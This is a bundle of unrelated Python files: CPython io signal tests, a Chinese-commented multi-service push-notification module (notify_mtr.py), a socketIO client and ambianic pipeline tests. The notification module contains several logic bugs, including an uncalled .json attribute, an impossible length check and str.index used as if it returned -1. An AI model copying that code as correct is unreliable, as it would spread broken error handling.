self.assertTrue(str(exc).startswith('reentrant call'), str(exc)
)
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b'xy', mode='wb')
def test_reentrant_write_text(self):
self.check_reentrant_write('xy', mode='w', encoding='ascii')
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs['closefd'] = False
def alarm_handler(sig, frame):
os.write(w, b'bar')
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b'foo')
signal.alarm(1)
self.assertEqual(decode(rio.read(6)), 'foobar')
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode='rb')
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x, mode='r')
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module('select')
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs['closefd'] = False
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b'x', mode='wb')
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry('x', mode='w', encoding='latin1')
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest,
PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest,
PyBufferedRandomTest, StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest)
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ['IncrementalNewlineDecoder']
c_io_ns = {name: getattr(io, name) for name in all_members}
py_io_ns = {name: getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs['C' + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs['Py' + x.__name__]) for x in mocks)
py_io_ns['open'] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith('C'):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith('Py'):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == '__main__':
unittest.main()
|
notify_mtr.py
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import json
import os
import re
import threading
import time
import traceback
import urllib.parse
import requests
import tomli
from utils_env import get_file_path
link_reg = re.compile(r"<a href=['|\"](.+)['|\"]>(.+)<\s?/a>")
bold_reg = re.compile(r"<b>\s*(.+)\s*<\s?/b>")
list_reg = re.compile(r"^(\d+\.|-)\s.+$")
def html2md(content: str) -> str:
content = "\n".join(map(lambda x: x if list_reg.fullmatch(x) else x + "\n", content.split("\n")))
return bold_reg.sub(r"### **\1**", link_reg.sub(r"[\2](\1)", content))
# 原先的 print 函数和主线程的锁
_print = print
mutex = threading.Lock()
# 定义新的 print 函数
def print(text, *args, **kw):
"""
使输出有序进行,不出现多线程同一时间输出导致错乱的问题。
"""
with mutex:
_print(text, *args, **kw)
# 通知服务
# fmt: off
push_config = {
'HITOKOTO': False, # 启用一言(随机句子)
'BARK_PUSH': '', # bark IP 或设备码,例:https://api.day.app/DxHcxxxxxRxxxxxxcm
'BARK_ARCHIVE': '', # bark 推送是否存档
'BARK_GROUP': '', # bark 推送分组
'BARK_SOUND': '', # bark 推送声音
'CONSOLE': True, # 控制台输出
'DD_BOT_SECRET': '', # 钉钉机器人的 DD_BOT_SECRET
'DD_BOT_TOKEN': '', # 钉钉机器人的 DD_BOT_TOKEN
'FSKEY': '', # 飞书机器人的 FSKEY
'GOBOT_URL': '', # go-cqhttp
# 推送到个人QQ:http://127.0.0.1/send_private_msg
# 群:http://127.0.0.1/send_group_msg
'GOBOT_QQ': '', # go-cqhttp 的推送群或用户
# GOBOT_URL 设置 /send_private_msg 时填入 user_id=个人QQ
# /send_group_msg 时填入 group_id=QQ群
'GOBOT_TOKEN': '', # go-cqhttp 的 access_token
'IGOT_PUSH_KEY': '', # iGot 聚合推送的 IGOT_PUSH_KEY
'PUSH_KEY': '', # server 酱的 PUSH_KEY,兼容旧版与 Turbo 版
'PUSH_PLUS_TOKEN': '', # push+ 微信推送的用户令牌
'PUSH_PLUS_USER': '', # push+ 微信推送的群组编码
'QMSG_KEY': '', # qmsg 酱的 QMSG_KEY
'QMSG_TYPE': '', # qmsg 酱的 QMSG_TYPE
'QYWX_AM': '', # 企业微信应用
'QYWX_KEY': '', # 企业微信机器人
'TG_BOT_TOKEN': '', # tg 机器人的 TG_BOT_TOKEN,例:1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
'TG_USER_ID': '', # tg 机器人的 TG_USER_ID,例:1434078534
'TG_API_HOST': '', # tg 代理 api
'TG_PROXY_AUTH': '', # tg 代理认证参数
'TG_PROXY_HOST': '', # tg 机器人的 TG_PROXY_HOST
'TG_PROXY_PORT': '', # tg 机器人的 TG_PROXY_PORT
}
notify_function = []
# fmt: on
# 首先读取 面板变量 或者 github action 运行变量
for k in push_config:
if v := os.getenv(k):
push_config[k] = v
# 读取配置文件中的变量 (会覆盖环境变量)
CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.toml")
if os.path.exists(CONFIG_PATH):
print(f"通知配置文件存在:{CONFIG_PATH}。")
try:
for k, v in dict(tomli.load(open(CONFIG_PATH, "rb"))).items():
if k in push_config:
push_config[k] = v
except tomli.TOMLDecodeError:
print(
f"错误:配置文件 {CONFIG_PATH} 格式不对,请学习 https://toml.io/cn/v1.0.0\n错误信息:\n{traceback.format_exc()}"
)
elif CONFIG_PATH:
print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!")
def bark(title: str, content: str) -> None:
"""
使用 bark 推送消息。
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH").rstrip("/")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
datas = requests.get(url, timeout=15).json()
if datas.get("code") == 200:
print("bark 推送成功!")
elif datas.get("code") == 400:
print("bark 推送失败!找不到 Key 对应的 DeviceToken。")
else:
print(f"bark 推送失败!响应数据:{datas}")
def console(title: str, content: str) -> None:
"""
使用 控制台 推送消息。
"""
print(f"{title}\n\n{content}")
def dingding_bot(title: str, content: str) -> None:
"""
使用 钉钉机器人 推送消息。
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "markdown", "markdown": {"text": html2md(content), "title": title}}
datas = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if datas.get("errcode") == 0:
print("钉钉机器人 推送成功!")
else:
print(f"钉钉机器人 推送失败!响应数据:{datas}")
def feishu_bot(title: str, content: str) -> None:
"""
使用 飞书机器人 推送消息。
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
datas = requests.post(url, data=json.dumps(data), timeout=15)
datas = datas.json
if datas.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print(f"飞书 推送失败!响应数据:{datas}")
def go_cqhttp(title: str, content: str) -> None:
"""
使用 go_cqhttp 推送消息。
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
datas = requests.get(url, timeout=15).json()
if datas.get("status") == "ok":
print("go-cqhttp 推送成功!")
else:
print(f"go-cqhttp 推送失败!响应数据:{datas}")
def iGot(title: str, content: str) -> None:
"""
使用 iGot 推送消息。
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
datas = requests.post(url, data=data, headers=headers, timeout=15).json()
if datas.get("ret") == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!错误信息:{datas.get("errMsg")}')
def serverJ(title: str, content: str) -> None:
"""
通过 serverJ 推送消息。
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
datas = requests.post(url, data=data, timeout=15).json()
if datas.get("errno") == 0 or datas.get("code") == 0:
print("serverJ 推送成功!")
elif datas.get("code") == 40001:
print("serverJ 推送失败!PUSH_KEY 错误。")
else:
print(f'serverJ 推送失败!错误码:{datas.get("message")}')
def pushplus_bot(title: str, content: str) -> None:
"""
通过 push+ 推送消息。
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
datas = requests.post(url=url, data=body, headers=headers, timeout=15).json()
if datas.get("code") == 200:
print("PUSHPLUS 推送成功!")
elif datas.get("code") == 600:
url2 = "http://pushplus.hxtrip.com/send"
headers["Accept"] = "application/json"
datas2 = requests.post(url=url2, data=body, headers=headers, timeout=15).json()
if datas2.get("code") == 200:
print("PUSHPLUS(hxtrip) 推送成功!")
elif datas2.get("code") == 600:
print("PUSHPLUS 推送失败!PUSH_PLUS_TOKEN 错误。")
else:
print(f"PUSHPLUS(hxtrip) 推送失败!响应数据:{datas2}")
else:
print(f"PUSHPLUS 推送失败!响应数据:{datas}")
def qmsg_bot(title: str, content: str) -> None:
"""
使用 qmsg 推送消息。
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
datas = requests.post(url=url, params=payload, timeout=15).json()
if datas.get("code") == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!错误信息:{datas.get("reason")}')
def wecom_app(title: str, content: str) -> None:
"""
通过 企业微信 APP 推送消息。
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
if 4 < len(QYWX_AM_AY) > 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
# 如果没有配置 media_id 默认就以 text 方式发送
if not media_id:
message = title + "\n\n" + content
datas = wx.send_text(message, touser)
else:
datas = wx.send_mpnews(title, content, media_id, touser)
if datas == "ok":
print("企业微信推送成功!")
else:
print(f"企业微信推送失败!错误信息:{datas}")
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values, timeout=15)
datas = json.loads(req.text)
return datas.get("access_token")
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values), "utf-8")
datas = requests.post(send_url, send_msges, timeout=15).json()
return datas.get("errmsg")
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values), "utf-8")
datas = requests.post(send_url, send_msges, timeout=15).json()
return datas.get("errmsg")
def wecom_bot(title: str, content: str) -> None:
"""
通过 企业微信机器人 推送消息。
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
datas = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if datas.get("errcode") == 0:
print("企业微信机器人 推送成功!")
else:
print(f"企业微信机器人 推送失败!响应数据:{datas}")
def telegram_bot(title: str, content: str) -> None:
"""
使用 telegram 机器人 推送消息。
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"<b><u>{title}</u></b>\n\n{content}",
"disable_web_page_preview": "true",
"parse_mode": "HTML",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get("TG_PROXY_HOST"):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
datas = requests.post(
url=url, headers=headers, params=payload, proxies=proxies, timeout=15
).json()
if datas.get("ok") == True:
print("tg 推送成功!")
elif datas.get("error_code") == 400:
print("tg 推送失败!请主动给 bot 发送一条消息并检查接收用户 TG_USER_ID 是否正确。")
elif datas.get("error_code") == 401:
print("tg 推送失败!TG_BOT_TOKEN 填写错误。")
else:
print(f"tg 推送失败!响应数据:{datas}")
def one() -> str:
"""
获取一条一言。
:return:
"""
try:
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
except requests.exceptions.ConnectionError:
return ""
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
def excepthook(args, /):
if issubclass(args.exc_type, requests.exceptions.RequestException):
print(
f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}"
)
elif issubclass(args.exc_type, json.JSONDecodeError):
print(
f"推送返回值非 json 格式,请检查网址和账号是否填写正确。信息:{str(args.exc_type)}, {args.thread.name}"
)
else:
global default_hook
default_hook(args)
default_hook = threading.excepthook
threading.excepthook = excepthook
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
content += "\n\n> " + one() if hitokoto else ""
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
test_socket_client.py
|
from threading import Thread
import time
from socketIO_client import SocketIO
host = 'localhost'
port = 5000
class TwoWayClient(object):
def on_event(self, event):
print(event)
def __init__(self):
self.socketio = SocketIO(host, port)
self.socketio.on('latencyResponse', self.on_event)
self.receive_events_thread = Thread(target=self._receive_events_thread)
self.receive_events_thread.daemon = True
self.receive_events_thread.start()
while True:
self.socketio.emit('latency', {'timestamp': int(time.time())})
def _receive_events_thread(self):
self.socketio.wait(seconds=0.1)
def main():
TwoWayClient()
if __name__ == "__main__":
main()
|
test_interpreter_more.py
|
"""More test cases for ambianic.interpreter module."""
import logging
import threading
import time
from ambianic import pipeline
from ambianic.pipeline import interpreter
from ambianic.pipeline.avsource.av_element import AVSourceElement
from ambianic.pipeline.interpreter import (
HealingThread,
Pipeline,
PipelineServer,
PipelineServerJob,
)
log = logging.getLogger()
log.setLevel(logging.DEBUG)
def setup_module(module):
"""setup any state specific to the execution of the given module."""
# Reset default class
interpreter.PIPELINE_CLASS = None
interpreter.Pipeline.PIPELINE_OPS["source"] = AVSourceElement
def teardown_module(module):
"""teardown any state that was previously setup with a setup_module
method."""
# Reset default class
interpreter.PIPELINE_CLASS = None
interpreter.Pipeline.PIPELINE_OPS["source"] = AVSourceElement
class _TestSourceElement(pipeline.PipeElement):
"""Produce one sample and exit start loop."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
self.start_called = False
self.stop_called = False
def start(self):
self.start_called = True
super().start()
# send one sample down the pipe
self.receive_next_sample(sample=[1, 2, 3])
def stop(self):
self.stop_called = True
super().stop()
def _get_config(source_class=None):
# override source op with a mock test class
Pipeline.PIPELINE_OPS["source"] = source_class
server_config = {
"pipelines": {"pipeline_one": [{"source": {"uri": "test"}}]},
}
return server_config
def test_pipeline_server_init():
conf = _get_config(_TestSourceElement)
server = PipelineServerJob(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
def _get_config_invalid_element(source_class=None):
# override source op with a mock test class
Pipeline.PIPELINE_OPS["source"] = source_class
pipeline_config = [
{"source": {"uri": "test"}},
{"scifi": {"one": "day soon"}},
]
return pipeline_config
class _TestPipeline(Pipeline):
def __init__(self, pname=None, pconfig=None):
self._test_on_unknown_pipe_element_called = False
self._test_on_healing_already_in_progress_called = False
self._test_on_start_no_elements_called = False
super().__init__(pname=pname, pconfig=pconfig)
def _on_unknown_pipe_element(self, name=None):
self._test_on_unknown_pipe_element_called = True
log.debug("_on_unknown_pipe_element called")
super()._on_unknown_pipe_element(name=name)
def _on_healing_already_in_progress(self):
self._test_on_healing_already_in_progress_called = True
super()._on_healing_already_in_progress()
def _on_start_no_elements(self):
self._test_on_start_no_elements_called = True
super()._on_start_no_elements()
def test_pipeline_init_invalid_element():
conf = _get_config_invalid_element(_TestSourceElement)
pipeline = _TestPipeline(pname="test", pconfig=conf)
assert pipeline._test_on_unknown_pipe_element_called
assert len(pipeline._pipe_elements) == 1
assert isinstance(pipeline._pipe_elements[0], _TestSourceElement)
class _TestSourceElement2(pipeline.PipeElement):
"""Produce samples until stop signal."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
self._test_element_started = threading.Event()
def start(self):
super().start()
self._test_element_started.set()
# generate samples until stopped
while self.state == pipeline.PIPE_STATE_RUNNING:
self.receive_next_sample(sample=[1, 2, 3])
def test_pipeline_server_start_stop():
conf = _get_config(_TestSourceElement2)
server = PipelineServerJob(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
server.start()
source_pe._test_element_started.wait(timeout=3)
assert source_pe.state == pipeline.PIPE_STATE_RUNNING
assert server._threaded_jobs[0].is_alive()
server.stop()
# give it enough time to clean up resources
# in child threads (if any).
time.sleep(3)
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
def test_pipeline_server_config_change():
conf = _get_config(_TestSourceElement2)
PipelineServer(conf)
del conf["pipelines"]["pipeline_one"][0]
class _TestSourceElement3(pipeline.PipeElement):
"""Produce samples until stop signal."""
def __init__(self, **element_config):
super().__init__()
self._test_heal_called = threading.Event()
self._test_sample_released = threading.Event()
log.debug("heal() not called yet")
def heal(self):
self._test_heal_called.set()
log.debug("heal() called")
def start(self):
super().start()
# send one samples until stopped
while self.state == pipeline.PIPE_STATE_RUNNING:
self.receive_next_sample(sample=[1, 2, 3])
# artifitial delay to force heal()
log.debug("delaying next sample to cause heal()")
time.sleep(2)
self._test_sample_released.set()
time.sleep(2)
def test_pipeline_server_heal():
conf = _get_config(_TestSourceElement3)
server = PipelineServerJob(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
server.MAX_HEARTBEAT_INTERVAL = 1
server.start()
source_pe._test_sample_released.wait(timeout=5)
assert source_pe.state == pipeline.PIPE_STATE_RUNNING
assert server._threaded_jobs[0].is_alive()
server.healthcheck()
assert source_pe._test_heal_called.wait(timeout=5)
server.stop()
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
class _TestPipelineServer2(PipelineServerJob):
def __init__(self, config=None):
super().__init__(config=config)
self._test_on_terminal_health_called = threading.Event()
def _on_terminal_pipeline_health(self, pipeline=None, lapse=None):
log.debug("_on_terminal_pipeline_health called")
super()._on_terminal_pipeline_health(pipeline, lapse)
self._test_on_terminal_health_called.set()
def test_pipeline_terminal_health():
conf = _get_config(_TestSourceElement3)
server = _TestPipelineServer2(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
server.TERMINAL_HEALTH_INTERVAL = 1
server.start()
source_pe._test_sample_released.wait(timeout=5)
server.healthcheck()
assert server._test_on_terminal_health_called.wait(timeout=5)
server.stop()
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
class _TestDummyElement(pipeline.PipeElement):
"""Dummy pass through element."""
def __init__(self, **element_config):
super().__init__()
self._config = element_config
self._test_heal_called = False
_sample_processed = False
def process_sample(self, sample=None):
assert sample == [1, 2, 3]
self._sample_processed = True
yield {"sample": sample}
def _get_pipeline_config_2_elements():
# override source op with a mock test class
Pipeline.PIPELINE_OPS["source"] = _TestSourceElement
Pipeline.PIPELINE_OPS["dummy"] = _TestDummyElement
pipeline_config = [{"source": {"uri": "test"}}, {"dummy": {"dummy": "config"}}]
return pipeline_config
def test_pipeline_start2():
conf = _get_pipeline_config_2_elements()
pipeline = _TestPipeline(pname="test", pconfig=conf)
assert len(pipeline._pipe_elements) == 2
assert isinstance(pipeline._pipe_elements[0], _TestSourceElement)
assert isinstance(pipeline._pipe_elements[1], _TestDummyElement)
pipeline.start()
dummy = pipeline._pipe_elements[1]
assert dummy._sample_processed
pipeline.stop()
class _TestSourceElement4(pipeline.PipeElement):
"""Produce samples until stop signal."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
def start(self):
super().start()
self.receive_next_sample(sample=[1, 2, 3])
def heal(self):
# delay to test 2xheal()
time.sleep(2)
def test_pipeline_heal2():
Pipeline.PIPELINE_OPS["source"] = _TestSourceElement4
pipeline_config = [
{"source": {"uri": "test"}},
]
pipeline = _TestPipeline(pname="test", pconfig=pipeline_config)
assert len(pipeline._pipe_elements) == 1
assert isinstance(pipeline._pipe_elements[0], _TestSourceElement4)
pipeline.start()
pipeline.heal()
assert not pipeline._test_on_healing_already_in_progress_called
pipeline.heal()
assert pipeline._test_on_healing_already_in_progress_called
pipeline.stop()
def test_pipeline_start_no_elements():
Pipeline.PIPELINE_OPS["source"] = _TestSourceElement4
pipeline_config = [{"source": "unavailable"}]
pipeline = _TestPipeline(pname="test", pconfig=pipeline_config)
assert len(pipeline._pipe_elements) == 0
pipeline.start()
assert pipeline._test_on_start_no_elements_called
def test_healing_thread():
_target_called = False
def target():
nonlocal _target_called
_target_called = True
raise RuntimeError()
_on_finished_called = False
def on_finished():
nonlocal _on_finished_called
_on_finished_called = True
raise RuntimeError()
healer = HealingThread(target=target, on_finished=on_finished)
healer.run()
assert _target_called
assert _on_finished_called
class _TestPipelineServer5(PipelineServerJob):
_test_on_threaded_job_ended_called = False
def _on_pipeline_job_ended(self, threaded_job=None):
self._test_on_threaded_job_ended_called = True
super()._on_pipeline_job_ended(threaded_job=threaded_job)
class _TestSourceElement5(pipeline.PipeElement):
"""Produce one sample and exit start loop."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
def start(self):
super().start()
# send one sample down the pipe
self.receive_next_sample(sample=[1, 2, 3])
super().stop()
def test_on_pipeline_job_ended():
conf = _get_config(_TestSourceElement5)
server = _TestPipelineServer5(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
server.start()
# give time to pipeline job to exit
time.sleep(2)
server.healthcheck()
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
